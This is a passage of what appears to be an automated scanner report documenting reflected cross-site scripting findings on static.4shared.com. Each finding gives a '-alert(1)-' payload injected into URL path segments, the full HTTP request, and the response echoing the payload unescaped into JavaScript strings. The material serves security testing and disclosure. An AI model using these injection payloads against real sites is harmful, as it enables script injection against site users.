This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css3a30e'-alert(1)-'42eda4d21a9/main.css?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /css3a30e'-alert(1)-'42eda4d21a9/main.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=2483E40DBADA5C303BC07F29EF4C1A06.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:39:50 GMT
Content-Length: 36155

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
f(typeof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://static.4shared.com/css3a30e'-alert(1)-'42eda4d21a9/main.css',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

fun
...[SNIP]...

1.83. http://static.4shared.com/css/main.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/css/main.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c985c"-alert(1)-"b752c3bde16 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cssc985c"-alert(1)-"b752c3bde16/main.css?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /cssc985c"-alert(1)-"b752c3bde16/main.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=62828B98EDCEF6917906D0ED8AD17B11.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:39:49 GMT
Content-Length: 36155

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/cssc985c"-alert(1)-"b752c3bde16/main.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

1.84. http://static.4shared.com/css/main.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/css/main.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 36f79'-alert(1)-'31b37e68c2b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/main.css36f79'-alert(1)-'31b37e68c2b?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /css/main.css36f79'-alert(1)-'31b37e68c2b
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=DC01C053EEB2B018E771FB8D306D929F.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:39:54 GMT
Content-Length: 36155

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://static.4shared.com/css/main.css36f79'-alert(1)-'31b37e68c2b',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ens
...[SNIP]...

1.85. http://static.4shared.com/css/main.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/css/main.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cf57b"-alert(1)-"ff7366fe274 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/main.csscf57b"-alert(1)-"ff7366fe274?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /css/main.csscf57b"-alert(1)-"ff7366fe274
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=3FD90ABD1F134D0ADB55B51E7E5F639F.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:39:53 GMT
Content-Length: 36155

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/css/main.csscf57b"-alert(1)-"ff7366fe274";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.86. http://static.4shared.com/css/mainWithoutCommon.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/css/mainWithoutCommon.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a73d5"-alert(1)-"09846515e43 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cssa73d5"-alert(1)-"09846515e43/mainWithoutCommon.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /cssa73d5"-alert(1)-"09846515e43/mainWithoutCommon.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=F38DB9F45A136E8B221A34E2337C577E.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:55:21 GMT
Content-Length: 36209

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/cssa73d5"-alert(1)-"09846515e43/mainWithoutCommon.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedb
...[SNIP]...

1.87. http://static.4shared.com/css/mainWithoutCommon.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/css/mainWithoutCommon.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1a1c2'-alert(1)-'34b638f1fb4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css1a1c2'-alert(1)-'34b638f1fb4/mainWithoutCommon.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /css1a1c2'-alert(1)-'34b638f1fb4/mainWithoutCommon.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=0FF7368F27F1046890FC90A99F5DBC9B.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:55:22 GMT
Content-Length: 36220

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
f(typeof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://static.4shared.com/css1a1c2'-alert(1)-'34b638f1fb4/mainWithoutCommon.css',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();

...[SNIP]...

1.88. http://static.4shared.com/css/mainWithoutCommon.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/css/mainWithoutCommon.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3487b'-alert(1)-'89537618450 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/mainWithoutCommon.css3487b'-alert(1)-'89537618450 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /css/mainWithoutCommon.css3487b'-alert(1)-'89537618450
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=A24598FDC9DA41EB2A1BB44ADF7297EE.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:55:29 GMT
Content-Length: 36209

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://static.4shared.com/css/mainWithoutCommon.css3487b'-alert(1)-'89537618450',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ens
...[SNIP]...

1.89. http://static.4shared.com/css/mainWithoutCommon.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/css/mainWithoutCommon.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 33792"-alert(1)-"feb36199e90 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/mainWithoutCommon.css33792"-alert(1)-"feb36199e90 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /css/mainWithoutCommon.css33792"-alert(1)-"feb36199e90
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=97181302BAA485314ABDA1BF00198219.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:55:28 GMT
Content-Length: 36220

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/css/mainWithoutCommon.css33792"-alert(1)-"feb36199e90";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.90. http://static.4shared.com/css/openid.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/css/openid.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 65720'-alert(1)-'25609123298 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css65720'-alert(1)-'25609123298/openid.css?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /css65720'-alert(1)-'25609123298/openid.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=A812856456886026C36F7C55D74C052F.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:17 GMT
Content-Length: 36154

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
f(typeof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://static.4shared.com/css65720'-alert(1)-'25609123298/openid.css',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

f
...[SNIP]...

1.91. http://static.4shared.com/css/openid.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/css/openid.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 37d0c"-alert(1)-"a384906c899 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css37d0c"-alert(1)-"a384906c899/openid.css?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /css37d0c"-alert(1)-"a384906c899/openid.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=7860F21A48FF0DD57CAE4EFCFF42B9F4.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:16 GMT
Content-Length: 36165

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/css37d0c"-alert(1)-"a384906c899/openid.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

1.92. http://static.4shared.com/css/openid.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/css/openid.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 16676'-alert(1)-'1f8fb802af was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/openid.css16676'-alert(1)-'1f8fb802af?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /css/openid.css16676'-alert(1)-'1f8fb802af
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=46D5BD8CDA58DF745FE33F6B0D121991.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:21 GMT
Content-Length: 36149

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
ginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://static.4shared.com/css/openid.css16676'-alert(1)-'1f8fb802af',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ens
...[SNIP]...

1.93. http://static.4shared.com/css/openid.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/css/openid.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 872dc"-alert(1)-"012793f9b37 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/openid.css872dc"-alert(1)-"012793f9b37?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /css/openid.css872dc"-alert(1)-"012793f9b37
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=626301118D083DFBF62DC91BC8AAF9A1.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:20 GMT
Content-Length: 36154

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/css/openid.css872dc"-alert(1)-"012793f9b37";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.94. http://static.4shared.com/css/pageDownload1/download.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/css/pageDownload1/download.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5430c"-alert(1)-"af2ee37e7b0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css5430c"-alert(1)-"af2ee37e7b0/pageDownload1/download.css?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /css5430c"-alert(1)-"af2ee37e7b0/pageDownload1/download.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=B6094042F2C403249AB360C71A1BE8A9.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:17 GMT
Content-Length: 36245

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/css5430c"-alert(1)-"af2ee37e7b0/pageDownload1/download.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function
...[SNIP]...

1.95. http://static.4shared.com/css/pageDownload1/download.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/css/pageDownload1/download.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a8f3f'-alert(1)-'fddb1002838 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cssa8f3f'-alert(1)-'fddb1002838/pageDownload1/download.css?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /cssa8f3f'-alert(1)-'fddb1002838/pageDownload1/download.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=DE7C6C0A2C57EB9B419A4F999DCBE4E6.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:18 GMT
Content-Length: 36234

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
f(typeof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://static.4shared.com/cssa8f3f'-alert(1)-'fddb1002838/pageDownload1/download.css',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox()
...[SNIP]...

1.96. http://static.4shared.com/css/pageDownload1/download.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/css/pageDownload1/download.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6a0a9"-alert(1)-"beb8e3c777b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/pageDownload16a0a9"-alert(1)-"beb8e3c777b/download.css?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /css/pageDownload16a0a9"-alert(1)-"beb8e3c777b/download.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=85F1E680A4F8851A5E53D7C01D5CF5D8.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:20 GMT
Content-Length: 36234

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/css/pageDownload16a0a9"-alert(1)-"beb8e3c777b/download.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

1.97. http://static.4shared.com/css/pageDownload1/download.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/css/pageDownload1/download.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b2c9d'-alert(1)-'31d64f0f3a7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/pageDownload1b2c9d'-alert(1)-'31d64f0f3a7/download.css?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /css/pageDownload1b2c9d'-alert(1)-'31d64f0f3a7/download.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=F9D3DD482CD8B1D84085F5FF6118CDD0.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:22 GMT
Content-Length: 36234

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
Box == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://static.4shared.com/css/pageDownload1b2c9d'-alert(1)-'31d64f0f3a7/download.css',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

...[SNIP]...

1.98. http://static.4shared.com/css/pageDownload1/download.css [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/css/pageDownload1/download.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 96d76'-alert(1)-'49d42fb02e7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/pageDownload1/download.css96d76'-alert(1)-'49d42fb02e7?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /css/pageDownload1/download.css96d76'-alert(1)-'49d42fb02e7
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=20BFD04036CAE51236620A0A8EF2151A.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:25 GMT
